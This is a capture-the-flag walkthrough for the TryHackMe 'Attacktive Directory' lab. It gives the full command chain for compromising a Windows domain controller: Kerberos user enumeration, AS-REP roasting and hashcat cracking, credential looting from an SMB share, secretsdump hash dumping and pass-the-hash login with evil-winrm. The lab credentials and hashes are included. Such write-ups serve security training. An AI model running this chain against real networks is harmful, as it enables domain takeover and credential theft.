# Attacktive Directory

**Room Link:** <https://tryhackme.com/room/attacktivedirectory>

## Walkthrough

### Setup

#### Installing Impacket

```
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install
```

#### Installing Bloodhound and Neo4j

```
apt install bloodhound neo4j
```

#### Installing kerbrute

```
git clone https://github.com/ropnop/kerbrute.git
cd kerbrute/
make all
```

### username and password custom lists for this machine

```
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
```

### Welcome to Attacktive Directory

#### **Initial Scan**

```
nmap -A $VICTIM
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F56s1RTj57Z7EYJYLzO5H%2Fimage.png?alt=media&#x26;token=c382830c-293f-40b4-a3ad-223399a3eecb" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FNHNuxPlX2hZcE7dqgltk%2Fimage.png?alt=media&#x26;token=8327c5a5-abe8-4901-b631-690d9c0b7554" alt=""><figcaption></figcaption></figure>

#### Scan all ports

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FSL1CCNc4POMrkyKSqmNv%2Fimage.png?alt=media&#x26;token=1e971702-8a2c-4830-aafc-8d08560f3532" alt=""><figcaption></figcaption></figure>

### netbios-ssn port 139 & microsoft-ds port 445

```
enum4linux $VICTIM
```

The NetBIOS-Domain Name of the machine

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FSLb7hdtba1bCZ3MeYDVw%2Fimage.png?alt=media&#x26;token=ccdccf6d-b690-4f5a-8dd6-66d9f5b4dc61" alt=""><figcaption></figcaption></figure>

### Enumerating Users via Kerberos port 88

```
kerbrute/dist/kerbrute_linux_386 userenum --dc=$VICTIM -d=spookysec.local. userlist.txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FvP2xka2fxHPxN5E638ZL%2Fimage.png?alt=media&#x26;token=2e6f7641-eff1-4903-8008-03547acf235b" alt=""><figcaption></figcaption></figure>

### Abusing Kerberos

**validusers.txt**

```
james
svc-admin
robin
darkstar
administrator
backup
paradox
```

svc-admin allows us to get a ticket without a password. The hash type is Kerberos 5 etype 23 AS-REP.

```
python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip $VICTIM spookysec.local/
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FjBS4YbjZf61OGhhZ61XY%2Fimage.png?alt=media&#x26;token=76a22e7a-e1c6-4160-a83e-7b6cf4f77c08" alt=""><figcaption></figcaption></figure>

Cracking the hash we can see the password is management2005

```
hashcat -m18200 hash.txt passwordlist.txt
hashcat -m18200 hash.txt passwordlist.txt --show
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FYkwTWsfs6zFBVhox2hfC%2Fimage.png?alt=media&#x26;token=00274ab6-bef7-4d0f-89a1-5c1dab612295" alt=""><figcaption></figcaption></figure>

### Back to the Basics

### netbios-ssn port 139 & microsoft-ds port 445

```
smbclient -L $VICTIM -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FssMtN3punviHhmmCpA7p%2Fimage.png?alt=media&#x26;token=4f35b5c7-2899-422f-9b4d-1054955c15af" alt=""><figcaption></figcaption></figure>

```
smbclient \\\\$VICTIM\\backup -U "svc-admin"
smb: \> dir
smb: \> get backup_credentials.txt 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FuEpNnjX2Ehn7PMnvzkME%2Fimage.png?alt=media&#x26;token=b430e204-a173-4ce3-9e5a-c39c006ef739" alt=""><figcaption></figcaption></figure>

Its a base64 encoded username and password. <backup@spookysec.local>:backup2517860

```
cat backup_credentials.txt
echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FG0nPjoijAk2DrEe85mWG%2Fimage.png?alt=media&#x26;token=e9b31557-16f2-488a-9bce-05883d75d824" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FZBYpqZWiealVpFR0S4BU%2Fimage.png?alt=media&#x26;token=69847633-2d6e-45be-9558-b92c287d5cca" alt=""><figcaption></figcaption></figure>

### Elevating Privileges within the Domain - **WinRM** port5985

```
python3 /usr/local/bin/secretsdump.py  spookysec.local/backup:backup2517860@$VICTIM > allhashes.txt
cat allhashes.txt | awk -F : '{print $1 ":" $3}' | sort | uniq
```

### Flag Submission PaneLogin as Administrator&#x20;

```
evil-winrm -i $VICTIM -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
```
